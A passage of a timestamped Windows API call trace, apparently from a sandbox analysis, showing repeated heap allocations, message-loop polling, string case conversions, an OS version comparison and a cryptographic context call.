[0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.057] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.058] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.058] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.058] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.058] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.058] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.058] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.059] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.060] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.060] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.061] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0257.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.061] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0257.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.062] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.062] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.062] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.062] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.062] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.062] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.062] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.063] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.063] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0257.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.063] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0257.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.064] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.064] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.065] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.065] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.065] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.065] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.065] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.066] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.066] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.066] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.066] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.066] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.067] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.067] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.068] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.068] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.068] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.069] 